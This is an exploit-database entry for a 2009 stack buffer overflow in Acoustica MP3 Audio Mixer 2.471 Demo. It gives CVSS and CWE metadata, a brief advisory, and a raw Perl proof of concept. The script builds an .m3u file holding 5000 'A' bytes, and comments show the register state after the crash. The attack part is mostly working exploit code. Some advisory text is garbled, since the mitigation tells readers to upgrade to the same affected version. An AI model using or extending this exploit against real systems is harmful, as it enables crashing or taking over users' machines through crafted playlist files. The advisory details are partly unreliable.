Acoustica MP3 Audio Mixer v.2.471 Demo Buffer Overflow

vendor:

MP3 Audio Mixer

by:

D3V!L FucK3r

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: MP3 Audio Mixer

Affected Version From: 2.471

Affected Version To: 2.471

Patch Exists: YES

Related CWE: N/A

CPE: a:acoustica:mp3_audio_mixer:2.471

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Vista SP1

2009

Acoustica MP3 Audio Mixer v.2.471 Demo Buffer Overflow

A buffer overflow vulnerability exists in Acoustica MP3 Audio Mixer v.2.471 Demo. The vulnerability is caused due to a boundary error when handling .m3u files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted .m3u file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Acoustica MP3 Audio Mixer v.2.471 Demo.

Source

Exploit-DB raw data:

#!/usr/perl/bin -w
#
#
#Foundr By : D3V!L FucK3r
#
#MY Email: w0@live.no
#
#Download : http://www.acoustica.com
#
#Tested  on : Windos vista sp1
#
#Version : mp3 audio mixer v.2.471 Demo
#
#if you Click Ã—Ã—Ã—Ã—Ã—Ã— and select file then ...... :)
#
# perl For a men :)
#
#Gretz to : Sa^Devl  ,    THEINJECTOR    ,   anti-trust
#
#EAX 03D7ADF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#ECX 41414141
#EDX 01EE0000
#EBX 00004141
#ESP 0012BC48
#EBP 0012BC74
#ESI 03E808E0
#EDI 00100000
#EIP 76ED04C1 ntdll.76ED04C1

$buff="\x41" x 5000;
open(MYFILE , '>>D3V!L FUCK3R.m3u')or die " File not found.";
print MYFILE $buff;
close (MYFILE);

print "Perl 4 a men :d\n";

###########################################

# milw0rm.com [2009-07-20]